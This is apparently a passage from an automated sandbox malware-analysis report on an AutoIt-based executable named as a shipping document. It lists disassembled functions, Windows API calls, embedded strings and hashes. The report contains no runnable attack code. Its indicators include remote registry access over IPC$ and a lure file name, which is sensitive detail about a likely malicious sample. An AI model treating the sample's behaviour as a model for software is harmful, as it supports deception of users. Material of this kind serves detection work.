                                                                • Instruction ID: f617d264df5e9569fba4ed287b832241fa54d11321f225c0d666e075d3f3867e
                                                                • Opcode Fuzzy Hash: f9a71752771c81c273b77d6d0378f39d904d54d8bfa477ac2274d6be83edfe46
                                                                • Instruction Fuzzy Hash: 06519C72904509AACF15EBE4DD86FEEB778AF48300F500169F919721A2EB312F58DF61
                                                                Function 0099A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00939837: __itow.LIBCMT ref: 00939862
                                                                  • Part of subcall function 00939837: __swprintf.LIBCMT ref: 009398AC
                                                                • CharLowerBuffW.USER32(?,?), ref: 0099A3CB
                                                                • GetDriveTypeW.KERNEL32 ref: 0099A418
                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0099A460
                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0099A497
                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0099A4C5
                                                                  • Part of subcall function 00937BCC: _memmove.LIBCMT ref: 00937C06
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                • API String ID: 2698844021-4113822522
                                                                • Opcode ID: edc7ec2ad0c15e372347da619ef49e11ef33a986848295e6ab75cf8055c926e3
                                                                • Instruction ID: 96a709bb3fcdbe2a824553305022c63fb13909e7fff3e544fc619644e75d7d5f
                                                                • Opcode Fuzzy Hash: edc7ec2ad0c15e372347da619ef49e11ef33a986848295e6ab75cf8055c926e3
                                                                • Instruction Fuzzy Hash: CD5169751083059FC710EF55C991A6AB7F8EFD8718F00886DF89A572A2DB71AD09CF82
                                                                Function 0098F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0096E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0098F8DF
                                                                • LoadStringW.USER32(00000000,?,0096E029,00000001), ref: 0098F8E8
                                                                  • Part of subcall function 00937DE1: _memmove.LIBCMT ref: 00937E22
                                                                • GetModuleHandleW.KERNEL32(00000000,009F5310,?,00000FFF,?,?,0096E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0098F90A
                                                                • LoadStringW.USER32(00000000,?,0096E029,00000001), ref: 0098F90D
                                                                • __swprintf.LIBCMT ref: 0098F95D
                                                                • __swprintf.LIBCMT ref: 0098F96E
                                                                • _wprintf.LIBCMT ref: 0098FA17
                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0098FA2E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                • API String ID: 984253442-2268648507
                                                                • Opcode ID: 7e64cebd09b63d3d831789562af424bb7069fc1394e706ed6c811ca688d88a62
                                                                • Instruction ID: 136c861a9312ce184a1832a19a440ac8063e408e463e55301f4066e2de12646c
                                                                • Opcode Fuzzy Hash: 7e64cebd09b63d3d831789562af424bb7069fc1394e706ed6c811ca688d88a62
                                                                • Instruction Fuzzy Hash: 20412CB2904209AACF15FBE0DD96FEEB778AF98310F500065F505B6192EA356F09CF61
                                                                Function 0096A8CB Relevance: 22.7, APIs: 15, Instructions: 211COMMONLIBRARYCODE
                                                                Download Yara Rule
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                                • String ID:
                                                                • API String ID: 884005220-0
                                                                • Opcode ID: ab61fedceb04bf8f0776aea64db6f09b6c5d01207f158b9a33d6bebce8e63e40
                                                                • Instruction ID: 781da285a19a80ce2abfc04f5735d80bc95f0a9fe899fc10497428a004b8bfa0
                                                                • Opcode Fuzzy Hash: ab61fedceb04bf8f0776aea64db6f09b6c5d01207f158b9a33d6bebce8e63e40
                                                                • Instruction Fuzzy Hash: F861F572A08212AFEB109F65DD0277A77A9EF41361F21411AE801B71D1EB78DD45CFA2
                                                                Function 009BBA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 009BBA56
                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 009BBA6D
                                                                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 009BBA78
                                                                • CloseHandle.KERNEL32(00000000), ref: 009BBA85
                                                                • GlobalLock.KERNEL32(00000000), ref: 009BBA8E
                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 009BBA9D
                                                                • GlobalUnlock.KERNEL32(00000000), ref: 009BBAA6
                                                                • CloseHandle.KERNEL32(00000000), ref: 009BBAAD
                                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 009BBABE
                                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,009C2CAC,?), ref: 009BBAD7
                                                                • GlobalFree.KERNEL32(00000000), ref: 009BBAE7
                                                                • GetObjectW.GDI32(?,00000018,000000FF), ref: 009BBB0B
                                                                • CopyImage.USER32(?,00000000,?,?,00002000), ref: 009BBB36
                                                                • DeleteObject.GDI32(00000000), ref: 009BBB5E
                                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 009BBB74
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                • String ID:
                                                                • API String ID: 3840717409-0
                                                                • Opcode ID: 91178dfba83a7234e11bbcd9d759c0ddca732561d2da9568d2c5de378fdb2111
                                                                • Instruction ID: 2678d990e25ef1fa06656e13552bb12895d86536ac23c565ab75de20b1902eaf
                                                                • Opcode Fuzzy Hash: 91178dfba83a7234e11bbcd9d759c0ddca732561d2da9568d2c5de378fdb2111
                                                                • Instruction Fuzzy Hash: 6C414975604208FFDB119F69DE98EAABBBCFB89721F104168F906D72A0C7709D01DB20
                                                                Function 0099D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • __wsplitpath.LIBCMT ref: 0099DA10
                                                                • _wcscat.LIBCMT ref: 0099DA28
                                                                • _wcscat.LIBCMT ref: 0099DA3A
                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0099DA4F
                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0099DA63
                                                                • GetFileAttributesW.KERNEL32(?), ref: 0099DA7B
                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 0099DA95
                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0099DAA7
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                • String ID: *.*
                                                                • API String ID: 34673085-438819550
                                                                • Opcode ID: bd4362d4618b6210c775b3c110013304fca0937db4846768662b260cbd567c87
                                                                • Instruction ID: 1a7440796cd6a6bd8d82cdb97a4c18c3dc3d8d9e8957b5b3579dd6f1fca26fa4
                                                                • Opcode Fuzzy Hash: bd4362d4618b6210c775b3c110013304fca0937db4846768662b260cbd567c87
                                                                • Instruction Fuzzy Hash: 6E8180725062419FCF24EF69C884A6AB7E8AF89314F184C2EF889DB251E634D945CB52
                                                                Function 009BC1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00932612: GetWindowLongW.USER32(?,000000EB), ref: 00932623
                                                                • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 009BC1FC
                                                                • GetFocus.USER32 ref: 009BC20C
                                                                • GetDlgCtrlID.USER32(00000000), ref: 009BC217
                                                                • _memset.LIBCMT ref: 009BC342
                                                                • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 009BC36D
                                                                • GetMenuItemCount.USER32(?), ref: 009BC38D
                                                                • GetMenuItemID.USER32(?,00000000), ref: 009BC3A0
                                                                • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 009BC3D4
                                                                • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 009BC41C
                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 009BC454
                                                                • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 009BC489
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                • String ID: 0
                                                                • API String ID: 1296962147-4108050209
                                                                • Opcode ID: 716f6bd862e4a97b1b9ba6321c2a23c5825843a03e517a74a12e497a7eb8819b
                                                                • Instruction ID: ca0218a52a623347bc6e3e4eb25538414f5215988d1a89e73dcc49a3bcf5378c
                                                                • Opcode Fuzzy Hash: 716f6bd862e4a97b1b9ba6321c2a23c5825843a03e517a74a12e497a7eb8819b
                                                                • Instruction Fuzzy Hash: 558181B0608301AFD710DF14CA94ABBBBE9FF88764F00492EFA95972A1D770D905DB52
                                                                Function 009A731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetDC.USER32(00000000), ref: 009A738F
                                                                • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 009A739B
                                                                • CreateCompatibleDC.GDI32(?), ref: 009A73A7
                                                                • SelectObject.GDI32(00000000,?), ref: 009A73B4
                                                                • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 009A7408
                                                                • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 009A7444
                                                                • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 009A7468
                                                                • SelectObject.GDI32(00000006,?), ref: 009A7470
                                                                • DeleteObject.GDI32(?), ref: 009A7479
                                                                • DeleteDC.GDI32(00000006), ref: 009A7480
                                                                • ReleaseDC.USER32(00000000,?), ref: 009A748B
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                • String ID: (
                                                                • API String ID: 2598888154-3887548279
                                                                • Opcode ID: dbb56aaba9feff97af654dd7c4bfa2462c79c1f8a9e30d9cd5f5f28d2c3cd827
                                                                • Instruction ID: 0f35e94471e2505b98abea2d9d97a2052604baa2e0aa232cef32aec6c77bcfbd
                                                                • Opcode Fuzzy Hash: dbb56aaba9feff97af654dd7c4bfa2462c79c1f8a9e30d9cd5f5f28d2c3cd827
                                                                • Instruction Fuzzy Hash: 55516971904309EFCB14CFA8DC85EAEBBB9EF49310F14852DF99A97221C731A840DB90
                                                                Function 009B0E1A Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 120COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CharUpperBuffW.USER32(?,?,?,?,?,?,?,009AFDAD,?,?), ref: 009B0E31
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: BuffCharUpper
                                                                • String ID: 0`$HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                • API String ID: 3964851224-3363271904
                                                                • Opcode ID: 6d394d453089e2d9f6509fd472430b18c0df69fff6d5f6fe4dcce0058e3e4b0e
                                                                • Instruction ID: 9f19849f6bbd698157199f957e1a0cc9cd01bb1fe6ad7cb88f4dcde63a19116a
                                                                • Opcode Fuzzy Hash: 6d394d453089e2d9f6509fd472430b18c0df69fff6d5f6fe4dcce0058e3e4b0e
                                                                • Instruction Fuzzy Hash: D441497120035A8BCF21EF51DA56BFF37A4AF91324F540454FC551B2A2EB349D1ACBA0
                                                                Function 00936A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00950957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00936B0C,?,00008000), ref: 00950973
                                                                  • Part of subcall function 00934750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00934743,?,?,009337AE,?), ref: 00934770
                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00936BAD
                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00936CFA
                                                                  • Part of subcall function 0093586D: _wcscpy.LIBCMT ref: 009358A5
                                                                  • Part of subcall function 0095363D: _iswctype.LIBCMT ref: 00953645
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                • API String ID: 537147316-1018226102
                                                                • Opcode ID: 8e204b77909d7e63cdbe71020e12dbeead4baa0f35e71722560a12f30143ac6e
                                                                • Instruction ID: 5f7039d021f362c32e1a4825c0977492976dd33c6cab1680b5cbf909c5049104
                                                                • Opcode Fuzzy Hash: 8e204b77909d7e63cdbe71020e12dbeead4baa0f35e71722560a12f30143ac6e
                                                                • Instruction Fuzzy Hash: 12027874108341AFCB24EF24C891AAFBBE5AFD9314F14491DF49A972A1DB30D949CF52
                                                                Function 00992D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • _memset.LIBCMT ref: 00992D50
                                                                • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00992DDD
                                                                • GetMenuItemCount.USER32(009F5890), ref: 00992E66
                                                                • DeleteMenu.USER32(009F5890,00000005,00000000,000000F5,?,?), ref: 00992EF6
                                                                • DeleteMenu.USER32(009F5890,00000004,00000000), ref: 00992EFE
                                                                • DeleteMenu.USER32(009F5890,00000006,00000000), ref: 00992F06
                                                                • DeleteMenu.USER32(009F5890,00000003,00000000), ref: 00992F0E
                                                                • GetMenuItemCount.USER32(009F5890), ref: 00992F16
                                                                • SetMenuItemInfoW.USER32(009F5890,00000004,00000000,00000030), ref: 00992F4C
                                                                • GetCursorPos.USER32(?), ref: 00992F56
                                                                • SetForegroundWindow.USER32(00000000), ref: 00992F5F
                                                                • TrackPopupMenuEx.USER32(009F5890,00000000,?,00000000,00000000,00000000), ref: 00992F72
                                                                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00992F7E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                • String ID:
                                                                • API String ID: 3993528054-0
                                                                • Opcode ID: 98d1bf614fef425a6e2a3237296f7fed67fab52397aa12977df195ebceb6f01f
                                                                • Instruction ID: 220578356bd065e21d2d67e74dee0844815d1b83cc436bb355b4f12b279b3890
                                                                • Opcode Fuzzy Hash: 98d1bf614fef425a6e2a3237296f7fed67fab52397aa12977df195ebceb6f01f
                                                                • Instruction Fuzzy Hash: C771C070644209BAEF219F5CDC89FAABF68FF44364F140216F625AA1E1C7B16860DB94
                                                                Function 009877DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00937BCC: _memmove.LIBCMT ref: 00937C06
                                                                • _memset.LIBCMT ref: 0098786B
                                                                • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 009878A0
                                                                • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 009878BC
                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 009878D8
                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00987902
                                                                • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 0098792A
                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00987935
                                                                • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0098793A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                • API String ID: 1411258926-22481851
                                                                • Opcode ID: 08ea0c022a1720eb992bbea85788b2bcaec31a7835ddb204cf3c59e9cc11063a
                                                                • Instruction ID: 3a503de890e35de146c36f0c5c8174eb49b48dce0656d443022e96175ad63274
                                                                • Opcode Fuzzy Hash: 08ea0c022a1720eb992bbea85788b2bcaec31a7835ddb204cf3c59e9cc11063a
                                                                • Instruction Fuzzy Hash: 8D41E772814229ABCF21EBE4DC95EEEF7B8BF44714F404169F915A3261EA319E04CF90
                                                                Function 0098F7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,0096E2A0,00000010,?,Bad directive syntax error,009BF910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 0098F7C2
                                                                • LoadStringW.USER32(00000000,?,0096E2A0,00000010), ref: 0098F7C9
                                                                  • Part of subcall function 00937DE1: _memmove.LIBCMT ref: 00937E22
                                                                • _wprintf.LIBCMT ref: 0098F7FC
                                                                • __swprintf.LIBCMT ref: 0098F81E
                                                                • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 0098F88D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708234260.00000000009E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708288783.00000000009EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.1708305624.00000000009F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_930000_DRAFT COPY BL, CI & PL.jbxd
                                                                Similarity
                                                                • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                • API String ID: 1506413516-4153970271
                                                                • Opcode ID: 56e1b74bf14edeb177dc5e005b1df9fdfdd52d8f7d80f486c24800dadf1da423
                                                                • Instruction ID: 43721ae2fb9826b591352a9c1b6e9d21c25f0afbe0091f2dbdccd7b8ad9abea6
                                                                • Opcode Fuzzy Hash: 56e1b74bf14edeb177dc5e005b1df9fdfdd52d8f7d80f486c24800dadf1da423
                                                                • Instruction Fuzzy Hash: 04218E3291421EEBCF12EFD0CC1AFEEB738BF58310F040465B515661A2DA31AA18DF51
                                                                Function 009952C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                  • Part of subcall function 00937BCC: _memmove.LIBCMT ref: 00937C06
                                                                  • Part of subcall function 00937924: _memmove.LIBCMT ref: 009379AD
                                                                • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00995330
                                                                • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00995346
                                                                • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00995357
                                                                • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00995369
                                                                • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0099537A
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.1708174598.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                                                                • Associated: 00000000.00000002.1708160698.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
